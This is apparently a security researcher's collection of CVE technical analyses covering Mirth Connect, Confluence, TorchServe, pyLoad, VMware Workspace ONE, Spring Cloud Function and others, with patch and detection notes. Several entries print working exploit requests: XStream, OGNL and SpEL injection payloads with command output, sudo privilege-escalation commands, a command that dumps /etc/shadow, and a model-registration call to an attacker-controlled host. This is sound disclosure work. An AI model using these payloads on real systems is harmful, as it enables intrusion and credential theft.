zeroSteiner (328)
Last Login: January 26, 2024
zeroSteiner's Latest (20) Contributions
Technical Analysis
Mirth Connect is vulnerable to unauthenticated RCE due to the mishandling of data that is unmarshalled by the XStream library. This vulnerability was originally reported by IHTeam in August 2023. Their report intentionally lacked any details as to the nature of the vulnerability in hopes of preventing its use in ransomware attacks.
This particular vulnerability affects versions <= 4.3.0 of Mirth Connect. A remote attacker can identify the target version using the REST API:
curl --location 'https://192.168.159.128:8443/api/server/version' \ --header 'X-Requested-With: OpenAPI'
Horizon3.ai researchers later determined that the patch for CVE-2023-37679 was incomplete. The Mirth Connect team addressed the issue by implementing a Deny List for the gadget chains published for XStream exploitation. In their writeup, Naveen Sunkavally noted that a common XStream payload was capable of exploiting the CVE-2023-37679 on certain versions of Java. Due to changes in more recent versions of Java however, the payload was not universal. Their writeup discloses a universal payload for exploiting CVE-2023-37679 as well as a payload that bypassed the denylist leading to CVE-2023-43208.
curl --location 'https://192.168.159.128:8443/api/users/' \ --header 'X-Requested-With: OpenAPI' \ --header 'Content-Type: application/xml' \ --header 'Cookie: JSESSIONID=node01d59tmo5726v0tnjjk6jot7161.node0' \ --data '<sorted-set> <string>foo</string> <dynamic-proxy> <interface>java.lang.Comparable</interface> <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler"> <target class="java.lang.ProcessBuilder"> <command> <string>sh</string> <string>-c</string> <string>touch /tmp/success</string> </command> </target> <methodName>start</methodName> <eventTypes/> </handler> </dynamic-proxy> </sorted-set>
CVE-2023-37679 exploit using the XStream payload disclosed by Horizon3.ai
Exploitation of this vulnerability yields code execution in the context of the service account. When run in docker, this is a non-root account; however, when installed on Windows, this is NT AUTHORITY\SYSTEM.
To remediate this vulnerability, users should upgrade to version 4.4.0. Users should be aware, though, that 4.4.0 is vulnerable to CVE-2023-43208 and instead upgrade to 4.4.1 in which there are no publicly disclosed bypasses for this particular vector.
Technical Analysis
Overview
A vulnerability exists within Atlassian Confluence which enables a remote and unauthenticated attacker to achieve OS command execution in the context of the application. The vulnerability is due to the text-inline.vm
velocity template allowing the label
parameter to be passed to an OGNL-sink. By using the technique published by Rahul Maini and Harsh Jaiswal of ProjectDiscovery, an attacker can break out of the sandbox enforced by Struts using the .KEY_velocity.struts2.context
value exposed within the request. This was the basis for many of the public PoCs which followed the pattern demonstrated below.
curl --location 'http://localhost:8090/template/aui/text-inline.vm' \ --header 'X-Cmd-In: touch /tmp/cmd_in' \ --header 'Content-Type: application/x-www-form-urlencoded' \ --header 'Cookie: JSESSIONID=7EC7F710425BEBB71F71363591CD03BD' \ --data-urlencode 'label=\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.p1,{})+\u0027' \ --data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader('\''Cmd-Ret'\'',(new freemarker.template.utility.Execute()).exec({"id"}))' HTTP/1.1 200 Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-Confluence-Request-Time: 1706122679440 Cmd-Ret: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence) X-Accel-Buffering: no Content-Type: text/html;charset=UTF-8 Content-Language: en-US Transfer-Encoding: chunked Date: Wed, 24 Jan 2024 18:57:59 GMT
As noted by ProjectDiscovery in their writeup, however, there is a 200-character limit on the OGNL expressions that are evaluated. In the previous example, this means that the length of the p1
parameter can not exceed 200 characters, meaning the OS command can not exceed 70 characters unless the command results are omitted from the response headers. An additional parameter can also be referenced to bypass this restriction, removing the 200 character limit from the OS command payload. In the following example, the p2
parameter contains the OS command, which is not subject to the 200-character limit and also has fewer character restrictions, making it easier to encode more complex command payloads.
curl -i --location 'http://localhost:8090/template/aui/text-inline.vm' \ --header 'X-Cmd-In: touch /tmp/cmd_in' \ --header 'Content-Type: application/x-www-form-urlencoded' \ --header 'Cookie: JSESSIONID=7EC7F710425BEBB71F71363591CD03BD' \ --data-urlencode 'label=\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.p1,{})+\u0027' \ --data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader('\''Cmd-Ret'\'',(new freemarker.template.utility.Execute()).exec({@org.apache.struts2.ServletActionContext@getRequest().getParameter('\''p2'\'')}))' \ --data-urlencode 'p2=sh -c $@|sh . echo id' HTTP/1.1 200 Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-Confluence-Request-Time: 1706122962559 Cmd-Ret: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence) X-Accel-Buffering: no Content-Type: text/html;charset=UTF-8 Content-Language: en-US Transfer-Encoding: chunked Date: Wed, 24 Jan 2024 19:02:42 GMT
This vulnerability also affects Windows systems. When installed on Microsoft Windows, Confluence will by default run as NT AUTHORITY\NETWORK SERVICE. An attacker can easily use namedpipe impersonation to target the RPCSS process to elevate themselves to NT AUTHORITY\SYSTEM. This well-documented privilege escalation technique makes this exploit valuable to attackers when targeting installations on Windows.
Remediation
This vulnerability was patched in version 8.5.4, 8.6.0 and 8.7.1. For complete version information, see CONFSERVER=93833.
Technical Analysis
The redis project patched a possible memory corruption vulnerability in the sdsResize
method using commit 5f5f298a. The changes addressed an edge case whereby the method may not set the simple dynamic string (SDS) type field. SDS values use a variable-sized header based on their type. The types are defined as one of HI_SDS_TYPE_5
, HI_SDS_TYPE_8
, HI_SDS_TYPE_16
, HI_SDS_TYPE_32
, or HI_SDS_TYPE_64
where the number defines the bit width of the length and size fields. HI_SDS_TYPE_5
is a special case where the length is encoded in the 5 most significant bits of the flags field (whose 3 least significant bits are the type), and there is no dedicated length or size field.
These types are defined in deps/hiredis/sds.h and the format is:
hisdshdr5 FBBBB... hisdshdr8 LAFBBBB... hisdshdr16 LLAAFBBBB... hisdshdr32 LLLLAAAAFBBBB... hisdshdr64 LLLLLLLLAAAAAAAAFBBBB... ^ ^ ^^ | | |\ (char *)sds points here | | \ 1 - byte of flags where the 3 LSBs are the type and the 5 MSBs are the size in hisdshdr5 or unused | \ N-bits of allocation size (number of bytes available for the buffer) \ N-bits of length (number of bytes used by the buffer)
The changes to sdsResize
ensure that when realloc
is not used to perform the resizing operation, that the type field is always set before the calls to sdssetlen
and sdssetalloc
. The unpatched implementation of sdsResize
would simply set the SDS length and size with the allocations were already considered to be “optimal”. If the allocation was already optimal and did not require a reallocation to adjust the size, but the SDS type itself needed to be increased to store the new value, the size field may overflow in such a way that the SDS size is marked as smaller than it is.
This condition would require:
- Redis be built with the
USE_JEMALLOC
macro, without this compile-time settingalloc_already_optimal
will never be truish
- That
sdsResize
be called to enlarge the SDS value
- That the allocation size occupied by the SDS value be the same as the new size that it is being enlarged to
- The original size be of a smaller SDS type than the new size (i.e. the new size requires more bits to store than are available within the original).
A quick spot check reveals that the redis
package provided by Fedora 39 is built with the USE_JEMALLOC
macro defined and meets the first condition. For the second condition, locations where sdsResize
is invoked need to be identified. This search yields the following 4 locations:
sdsRemoveFreeSpace
— This location will only reduce the size of the allocation
sdsTest
— These locations are only used as part of testing. Also the sizes are static.
clientsCronResizeQueryBuffer
— This location will only reduce the size of the allocation. It’s intended to run periodically to reclaim unused memory that was once occupied by the query buffer. It can not be used to enlarge the SDS value. The resize value could be set toc->bulklen
, which is attacker-controllable by using bulk loading, however, it will not be larger than the existing allocation.
hllSparseSet
hllSparseSet
This function uses sdsResize
to increase the size of the sds
struct.
This will call sdsResize
as the PFADD
command is received. The size will increment by three each time it is called. sdsResize
is only called when there are fewer than 3 bytes available in the sds
structure. When enlarging the sds
structure, o->ptr
is increased to either double its current value or 300, whichever is smaller. The sds
structure is resized in this way until it has reached server.hll_sparse_max_bytes
which is 3,000 by default. This means that it can only be resized at most 13 times. Of those 13 times the value is enlarged, it only changes SDS type twice, once from 5 to 8 the first time it is resized and then from 8 to 16 the 4th time it is resized. In neither of these cases is the existing allocation the same size as the requested one, most likely because of how the buffer is doubling in size at this point. Because the existing allocation size is not the same as the requested one, the alloc_already_optimal
value is false in sdsResize
and the branch is taken which sets the type correctly.
The hllSparseSet code path can be triggered with the following Python code for debugging:
import redis import time r = redis.Redis(host='localhost', port=6379, decode_responses=True) start = int(time.time()) for i in range(0x1000): r.pfadd('pf-' + str(start), str(i)) r.close()
Conclusion
Based on this analysis there is no demonstratable threat to the redis project posed by this bug. The necessary conditions to enlarge an SDS value in the way necessary to trigger the overflow are not reacable by any code path included in the most recent vulnerable version 7.2.3. Nevertheless, this bug should be and has been patched to prevent it’s use in the future. An ideal scenario where this bug could be leveraged would require the attacker to have a high degree of control over both the currently allocated size of the SDS and the new size. In that case, starting with an SDS of 0xff bytes and resizing it to 0x100 would use the affected code path and incorrectly set the length and size to 0.
Technical Analysis
I’ve marked this as difficult to exploit due to the number of conditions that must be met for an attacker to successfully leverage it.
Exploiting this vulnerability is not straightforward; there are multiple security restrictions in place to prevent exploitation.
The attacker needs the credentials of a valid user.
The attacker needs to be on the local area network.
More specifically, the user needs to have access to the Domain Controller / KDC to authenticate to the Exchange service with Kerberos (tcp/88).
[loadFromRemoteSources](https://learn.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/dd409252(v=vs.100))
needs to be enabled in the Exchange server’s .NET application configuration.This is a discrepancy between what I have observed and what is stated in the public analysis. The translated statement “但是好在还可以通过SMB共享加载其他机器上的程序集。” (translation: “But fortunately, you can also load assemblies on other machines through SMB sharing.”) appears to be false. When using .NET Framework 4, Exchange Server 2019 CU12 is unable to load the
FUSE.Paxos.dll
library from an SMB server as specified by a UNC path. In the default settings, the server even raises aSystem.IO.FileLoadException
exception when the path is local (e.g.C:\Shares
). Exchange Server 2019 requires .NET Framework version 4.8 to be installed, so there will not be any instances where an older version is in use that does not implement theloadFromRemoteSources
setting.Furthermore, according to More Implicit Uses of CAS Policy: loadFromRemoteSources which states:
For example, in .NET 3.5 the following code:
Assembly internetAssembly = Assembly.LoadFrom(@"https://www.microsoft.com/assembly.dll"); Assembly intranetAssembly = Assembly.LoadFrom(@"\\server\share\assembly.dll");
Will by default load internetAssembly with the Internet permission set and intranetAssembly with the LocalIntranet permission set. That was because the CLR would internally gather evidence for both assemblies and run that evidence though CAS policy in order to find the permission set to grant that assembly.
Now that the sandboxing model has changed in the v4 CLR, there is no more CAS policy to apply the assembly’s evidence to by default, and therefore default behavior of both of these loads would be to load the assemblies with a grant set of full trust.
A UNC path would have the LocalIntranet permission set by the CLR and the CAS policy in .NET 3.5. In version 4.0 though, it is prevented from loading without enabling
loadFromRemoteSources
because it would receive a grant set of full trust. This is aligned with the observed behavior.A crafted
FUSE.Paxos.dll
file must be placed in a location accessible from the target Exchange Server.Realistically, this will probably be on a network share that the attacker can write to that the Exchange Server can authenticate to and read from. Using default settings, the attacker can not host it on their own SMB server because Windows blocks shared folder access as unauthenticated guests.
If all of the necessary conditions are met, the vulnerability can be exploited reliably. The result is code execution in the context of NT AUTHORITY/SYSTEM as a new process is created. Starting a new process could be avoided by modifying the source of FUSE.Paxos.dll
.
Technical Analysis
TorchServer allows models to be registered from any HTTP server that the server can access. A remote, unauthenticated attacker can leverage this to register arbitrary model archives with the server using the register-a-model API.
This API can be invoked using cURL:
curl --location --request POST 'http://localhost:8081/models?url=http%3A%2F%2Fattackerip%3A8000%2Fmalicious.mar'
If the registration is successful, the model will need to be unregistered before it can be registered again.
This API can be invoked using cURL as well:
curl --location --request DELETE 'http://localhost:8081/models/malicious/1.0'
TorchServer version 0.8.1 and previous are vulnerable. This vulnerability was patched in 0.8.2. A remote user can invoke the api-description endpoint to determine the target version.
[smcintyre@localhost ~]$ curl --location --request OPTIONS 'http://localhost:8081' | jq '.info' % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 58576 100 58576 0 0 16.8M 0 --:--:-- --:--:-- --:--:-- 18.6M { "title": "TorchServe APIs", "description": "TorchServe is a flexible and easy to use tool for serving deep learning models", "version": "0.8.1" }
Exploitation With CVE-2022-1471
This vulnerability is notably more valuable when combined with CVE-2022-1471. In this case, the model archive (MAR file, .mar
) can contain a YAML configuration file that is capable of triggering remote code execution through a vulnerable version of the snakeyaml library. An attacker would construct the MAR file (which is a structured ZIP file) with a MAR-INFO/MANIFEST.json
that references a configuration file through the model.configFile
key. In the case of TorchServer 0.8.1, the ScriptEngineManager
gadget chain is effective. The ScriptEngineManager
has the advantage over other LDAP-based chains due to being HTTP-based. This means the TorchServer only needs to have access to one service from which it can retrieve the MAR file as well as the Java payload classes as opposed to requiring access to both an HTTP and LDAP service.
The serialized config file would look like the following where $payload_url
is the URL to where the Java class files are stored.
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["$payload_url"]]]]
When using this chain it is also necessary to host a services/javax.script.ScriptEngineFactory
file which contains the name of the payload class to load. When using this gadget chain, the payload class must implement javax.script.ScriptEngineFactory
. See SnakeYaml Deserilization exploited (2019) for more information.
The ResourceGadget
, C3P0WrapperConnPool
and BadAttributeValueExpException
gadget chains do not work against TorchServer 0.8.1, making the ScriptEngineManager
chain the only HTTP-based one to work from this comment in snakeyaml’s issue tracker.
Technical Analysis
snakeyaml contains a vulnerability whereby an attacker that has control over YAML data that is deserialized by an affected version can execute arbitrary Java code. There are multiple, gadget chains that have been published for exploiting this vulnerability. In practice, this vulnerability is most valuable for exploitation purposes when chained with another vulnerability that allows for it to be triggered remotely such as CVE-2023-43654.
This vulnerability is moderately difficult to weaponize due to a couple of factors. First, in most scenarios, the attacker will need to understand the context in which snakeyaml is used within the host application. This will involve figuring out a means by which to get the target application to deserialize YAML data controlled by the attacker through some kind of API call, for example. Secondly, while multiple gadget chains are publicly available for, the exploit developer will still need to do some trial and error to find a chain that works within the target application. Once a chain has been identified, the target application will require access to communicate with an attacker-controlled server from which to load the Java class data. In the public chains, this server would either be HTTP(S) or LDAP.
Code execution will occur in the context of the host application where the snakeyaml library is used. This means the payload will execute with the same privileges as the host application, which will be different on a case-by-case basis.
This vulnerability was fixed in version 2.0. See the issue on bitbucket for more information.
Technical Analysis
The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.
In order to authenticate to the AMQP service, a user would need to already have admin access to add a RabbitMQ user, or have recovered the credentials to the orion
account that SolarWinds sets up automatically. For that reason, I’ve marked this as “Authenticated” and “Requires elevated access” because the orion
account is not any ordinary user.
Technical Analysis
Description
pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services, the primary of which is on port 8000 and can not be used by external hosts. A secondary “Click ‘N’ Load” service runs on port 9666 and can be used remotely without authentication.
The vulnerability was patched in commit 7d73ba79 by disabling the pyimport
statement within the js2py execution environment.
From the original disclosure, the vulnerability can be validated with curl:
curl -i -s -k -X $'POST' \ --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \ $'http://127.0.0.1:9666/flash/addcrypted2'
Vulnerable instances will respond with a 500 error and a message that the decryption failed.
HTTP/1.1 500 INTERNAL SERVER ERROR Content-Type: text/html; charset=utf-8 Content-Length: 21 Access-Control-Max-Age: 1800 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, GET, POST Vary: Accept-Encoding Date: Thu, 16 Feb 2023 17:02:16 GMT Server: Cheroot/8.6.0 Could not decrypt key
Patched instances (v0.5.0) will also respond with a 500 error but the body of the response will include a stack trace in HTML with the following error:
<p><b>Error 500: SyntaxError: Line 1: Unexpected token pyimport</b></p> <p><b>Traceback (most recent call last):</b></p> <p><b> File "/usr/lib/python3.10/site-packages/flask/app.py", line 1820, in full_dispatch_request</b></p> <p><b> rv = self.dispatch_request()</b></p>
Technical Analysis
This is an alternative method for bypassing Exchange Emergency Mitigation Service (EEMS) protections for the ProxyNotShell exploit chain. When this CVE is combined with CVE-2022-41082, they yield code execution as NT AUTHORITY\SYSTEM.
Installing the original patches from Microsoft that were released in November fix this exploit chain as well. The technique is arguably redundant when EEMS can be bypassed using various encoding techniques. This alternative vector is likely most valuable when used to avoid generating exploitation following the original pattern.
Technical Analysis
CVE-2022-41082, also known as ProxyNotShell is an authenticated RCE in Microsoft Exchange. ProxyNotShell actually combines CVE-2022-41082 and CVE-2022-41040 for the whole attack chain. This CVE specifically however is the RCE component. The vulnerability is a deserialization flaw in Microsoft Exchange’s PSRP backend. The PSRP backend can be accessed by an authenticated attacker leveraging the SSRF flaw identified as CVE-2022-41040. The deserialization gadget was documented by ZDI in their blog. While this vulnerability affected Exchange Server 2013 and Exchange Server 2016, the gadget chain only worked with Exchange Server 2019 (version 15.2+). A new gadget chain could potentially be developed to exploit these older versions.
GTSC originally announced on September 28th that they had seen a new (at the time) 0-day attack against their customers using Microsoft Exchange. On November 8th, Microsoft released patches for the two vulnerabilities. Between September 28th and November, no public exploits combined the SSRF with the RCE. Private threat actors however were attempting to exploit the vulnerability which led Microsoft to issue Exchange Emergency Mitigation Service (EEMS) mitigations. These mitigations took the form of IIS rewrite rules which were able to be bypassed using encoding techniques. The last issued EEMS mitigation was able to be successfully bypassed by using IBM037v1 encoding, which can be demonstrated using the Metasploit module.
Successful code execution results in OS commands running as NT AUTHORITY\SYSTEM. The exploit is reliable to exploit and pretty quick (compared to ProxyShell which needed to gather a lot of information).
Technical Analysis
The VMware Workspace ONE Access, Identity Manager, and vRealize Automation products contain a locally exploitable vulnerability whereby the under-privileged horizon user can escalate their permissions to those of the root user. Notably, the horizon user runs the externally accessible web application. This means that remote code execution (RCE) within that component could be chained with this vulnerability to obtain remote code execution as the root user.
The vulnerability is due to the fact that the /usr/local/horizon/scripts/getProtectedLogFiles.hzn
script can be run with root privileges without a password using the sudo command. This script in turn will recursively change the ownership of a user-supplied directory to the horizon user, effectively granting them write permissions to all contents.
To demonstrate and exploit this vulnerability, the following command is executed as the horizon user:
sudo /usr/local/horizon/scripts/getProtectedLogFiles.hzn exportProtectedLogs /usr/local/horizon/scripts/
At this point, the horizon user has write access (through ownership) to a variety of scripts that they also have the right to invoke using sudo without a password. These scripts can be verified by executing sudo -n --list
. A careful attacker would have backed up the ownership information for each file in the directory they intend to target, and restored them once they had obtained root-level permissions.
The root cause of this vulnerability is that the exportProtectedLogs
subcommand invokes the getProtectedLogs
function which will change the ownership information to the TOMCAT_USER which happens to be horizon.
Excerpt from getProtectedLogFiles.hzn
:
function getProtectedLogs() { chown ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION rm -f $TARGET_DIR_LOCATION/messages* rm -f $TARGET_DIR_LOCATION/boot* rm -rf $TARGET_DIR_LOCATION/journal* cp $VAR_LOG_MESSAGES* $TARGET_DIR_LOCATION cp $BOOT_LOG_MESSAGES* $TARGET_DIR_LOCATION chown -R ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION/ }
See the original disclosure for more information.
Technical Analysis
The VMware Workspace ONE Access, Identity Manager, and vRealize Automation products contain a locally exploitable vulnerability whereby the under-privileged horizon user can escalate their permissions to those of the root user. Notably, the horizon user runs the externally accessible web application. This means that remote code execution (RCE) within that component could be chained with this vulnerability to obtain remote code execution as the root user.
The vulnerability is due to the fact that the permissions on the file /opt/vmware/certproxy/bin/cert-proxy.sh
are such that the horizon user is both the owner and has access to invoke this file.
To demonstrate and exploit this vulnerability, that file is overwritten, and then the following command is executed as the horizon user:
sudo /usr/local/horizon/scripts/certproxyService.sh restart
Note, that depending on the patch level of the system, the certproxyService.sh
script may be located at an alternative path and require a slightly different command:
sudo /opt/vmware/certproxy/bin/certproxyService.sh restart
In both cases, the horizon user is able to invoke the certproxyService.sh script from sudo without a password. This can be verified by executing sudo -n --list
. The certproxyService.sh
script invokes the systemctl command to restart the service based on its configuration file. The service configuration file, located at /run/systemd/generator.late/vmware-certproxy.service
, dispatches to /etc/rc.d/init.d/vmware-certproxy
through the ExecStart and ExecStop directives, which in turn executes /opt/vmware/certproxy/bin/cert-proxy.sh
.
The horizon user should not be the owner of or have write access to any executable files that run as root.
See the original disclosure for more information. This vulnerability has a public exploit in the form of a Metasploit module.
Technical Analysis
A vulnerability exists in the gitserver component of SourceGraph that allows remote and unauthenticated attackers that can access the service to configure git’s core.sshCommand
value which can then be triggered on demand by forcing a push operation. In order to be exploitable, the SourceGraph instance must have at least one cloned repository present. Cloning a repository is the first post-installation step that a Source Graph administrator is prompted to take. Once one or more repositories are cloned, a remote and unauthenticated attacker can enumerate them using curl http://$target:3178/list?cloned=true
. Successful exploitation results in code execution in the context of the gitserver user.
While a server with no cloned repositories is not exploitable, the vulnerability can still be checked by analyzing the response to a filtered command. The vulnerability can be checked for using the following curl command where $target
is the target server. This command fetches the current core.sshCommand
value and does not change it.
curl -X POST http://$target:3178/exec -d '{"Repo": "repo", "Args": ["config", "--default", "", "core.sshCommand"]}'
If the response is HTTP/400 with a body of “invalid command”, the server is not vulnerable. If it’s HTTP/404, it’s vulnerable but the selected repository does not exists, while if it’s HTTP/200 it’s vulnerable and the repository does exist.
SourceGraph fixed the vulnerability in version 3.37, but users must opt into the solution. The implemented fix was in the form of optional filtering on the /exec
endpoint to restrict the git commands that are able to be executed. Commit baff5680 (first released in v3.37) sets this value to default to true
however it does not appear to be the default for new installations. It’s unclear what the word default
means in this context. At the time of this writing, it looks like a future release may remove the option and always include the functionality. In the mean time, to enable this, SourceGraph administrators must navigate to Configuration > Site Configuration
and add the following JSON blob to the configuration file.
"experimentalFeatures": { "enableGitServerCommandExecFilter": true }
With that in place, the server will be patched for this vulnerability as unauthorized commands will be blocked. Blocked commands are logged since version 3.37 regardless of whether or not the filtering is active. A blocked command will generate a log line such as the following:
22:11:37 gitserver | {"SeverityText":"WARN","Timestamp":1657750297008909456,"InstrumentationScope":"server","Caller":"server/server.go:1381","Function":"github.com/sourcegraph/sourcegraph/cmd/gitserver/server.(*Server).exec","Body":"exec: bad command","Resource":{"service.name":"gitserver","service.version":"3.41.0","service.instance.id":"127.0.0.1:3178"},"Attributes":{"RemoteAddr":"192.168.159.128:45316","req.Args":["config","--default","","core.sshCommand"]}}
In this case the command that was run was git config --default "" core.sshCommand
from the test curl command.
See also https://github.com/rapid7/metasploit-framework/pull/16762
Technical Analysis
A remote and unauthenticated attacker can trigger a denial-of-service condition on Microsoft Windows Domain Controllers by leveraging a flaw that leads to a null pointer deference within the Windows kernel. This vulnerability was silently patched by Microsoft in April of 2022 in the same batch of changes that addressed the unrelated CVE-2022-24500 vulnerability.
CVE-2022-32230 is caused by a missing check in srv2!Smb2ValidateVolumeObjectsMatch
to verify that a pointer is not null before reading a PDEVICE_OBJECT from it and passing it to IoGetBaseFileSystemDeviceObject. This function is called from the dispatch routine for an SMB2 QUERY_INFO
request of the FILE_INFO
/ FILE_NORMALIZED_NAME_INFORMATION
class. Per the docs in MS-SMB2 section 3.3.5.20.1 Handling SMB2_0_INFO_FILE
, FILE_NORMALIZED_NAME_INFORMATION
is only available when the dialect is 3.1.1.
For FileNormalizedNameInformation information class requests, if not supported by the server implementation
<392>
, or if Connection.Dialect is “2.0.2”, “2.1” or “3.0.2”, the server MUST fail the request withSTATUS_NOT_SUPPORTED
.
Only newer versions of Windows that support the SMB 3.1.1 dialect are affected by this flaw (Windows 10 / Server 2019 and later).
To trigger this code path, a user would open any named pipe from the IPC$ share and make a QUERY_INFO
request for the FILE_NORMALIZED_NAME_INFORMATION
class. This typically requires user permissions or a non-default configuration enabling guest access. This is not the case, however, for the noteworthy exception of domain controllers where there are multiple named pipes that can be opened anonymously, such as netlogon
. An alternative named pipe that can be used but does typically require permissions is the srvsvc
pipe.
Under normal circumstances, the FILE_NORMALIZED_NAME_INFORMATION
class would be used to query the normalized name information of a file that exists on disk. This differs from the exploitation scenario which queries a named pipe.
A system that has applied the patch for this vulnerability will respond to the request with the error STATUS_NOT_SUPPORTED
.
Technical Analysis
By setting the Host
HTTP header to point to a server under an attacker’s control, the target application can be made to issue an authentication request to it. By having the server respond with an HTTP 200 to any POST request, an attacker can bypass authentication and login as any user.
Technical Analysis
There exists a vulnerability within /usr/local/horizon/scripts/publishCaCert.hzn
where a local attacker can invoke the script to make any file world-readable. The script is intended to facilitate certificate management, allowing cert files to be copied into /etc/ssl/certs
which is owned by root. The script can be invoked by the horizon
user without a sudo password.
The script takes two arguments, the first a path to the file to copy, the second the name of the file to write to the destination. The source path argument can be any file, but the destination is only the final component of the path meaning the file will be placed in /etc/ssl/certs
.
A local user running as horizon
(such as from successfully exploiting CVE-2022-22954) can exploit this vulnerability to recover the shadow file by executing:
horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7::: bin:x:18964:0:60:7::: daemon:x:18964:0:60:7::: messagebus:x:18964:0:60:7::: systemd-bus-proxy:x:18964:0:60:7::: systemd-journal-gateway:x:18964:0:60:7::: systemd-journal-remote:x:18964:0:60:7::: systemd-journal-upload:x:18964:0:60:7::: systemd-network:x:18964:0:60:7::: systemd-resolve:x:18964:0:60:7::: systemd-timesync:x:18964:0:60:7::: nobody:x:18964:0:60:7::: sshd:!:18964:0:60:7::: rabbitmq:!:18964::60:::: named:!:18964::60:::: postgres:!:18964:0:60:7::: horizon:!:18964:0:60:7::: sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7::: elasticsearch:!:18964::60::::
Detection
The file that is written to the /etc/ssl/certs
directory will still be owned by root making the attacker unable to delete it. A crafty attacker would backup an existing certificate file or create a new one, leak the file of their choosing and then overwrite it again with a legitimate certificate to remove the evidence of their leaked file. Users should look for files out of place in this directory, and inspect timestamps and the certificate contents to identify potential exploitation attempts of this vulnerability.
Remediation
VMWare patched this issue with hotfix HW-154129. The patch for the affected script adds validation to ensure that the argument is a certificate file.
Diff:
< . /usr/local/horizon/scripts/hzn-bin.inc < openssl x509 -noout -in $CERTFILE 2>/dev/null < < if [ $? -ne 0 ]; then < echo "ERROR: This is not a certificate file" < exit 1 < fi <
Technical Analysis
CVE-2022-22963 is an unauthenticated remote code execution vulnerability within Spring Cloud Function prior to 3.1.7 and 3.2.3. This vulnerability should not be confused with the reported 0-day dubbed Spring4Shell that was disclosed at around the same time.
The cause of this vulnerability is an unsafe evaluation context for the Spring Expression Language (SpEL) that can be included in the spring.cloud.function.routing-expression
header. By crafting a POST request with the header, an attacker may execute malicious SpEL queries resulting in code execution in the context of the Spring Cloud Function application.
One early PoC demonstrated that the SpEL query could be used to execute an OS command through the Java Runtime. The following example echos to the /tmp/success
file. It differs from the original by using an array of strings for the arguments passed to exec
. Because the header value is an SpEL query, single quotes should be escaped by doubling them.
POST /functionRouter HTTP/1.1 Host: 192.168.159.128:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69 spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','echo "hello world" >> /tmp/msf-success'}) Content-Type: application/x-www-form-urlencoded Content-Length: 0
On successful exploitation, the server responds with a 500 error and a JSON response.
HTTP/1.1 500 Internal Server Error Content-Type: application/json Content-Length: 153 {"timestamp":"2022-03-30T20:41:28.551+00:00","path":"/functionRouter","status":500,"error":"Internal Server Error","message":"","requestId":"8fed4100-1"}
The response from a server that was patched for the vulnerability (versions 3.1.7 and 3.2.3) is identical.
The vulnerability was patched on March, 29th, 2022 in commit bcb2a25a. The patch adds a second evaluation context and uses it when the SpEL query originates from the HTTP request header. The SimpleEvaluationContext is used when the query originates from a header.
SimpleEvaluationContext is tailored to support only a subset of the SpEL language syntax, e.g. excluding references to Java types, constructors, and bean references.
Technical Analysis
A locally exploitable vulnerability exists within Microsoft’s OMI management server in versions prior to 1.6.8-1 that can allow a local attacker to execute operating system commands as root
. Exploitation consists of sending crafted binary messages to the local UNIX socket on which the service listens. Under normal circumstances, clients (typically omicli
) will send an authentication frame via this interface however the authentication frame can be omitted. In this case, the default values which are initialized to 0 are used and happen to correspond to the UID and GID of the root user and group.
The service must be running in order for this vulnerability to be exploited. The socket file is located at /var/opt/omi/run/omiserver.sock
and can be connected to by anyone using a socket of the AF_UNIX
family.
The strace
utility can be used to view the standard exchange of authentication information:
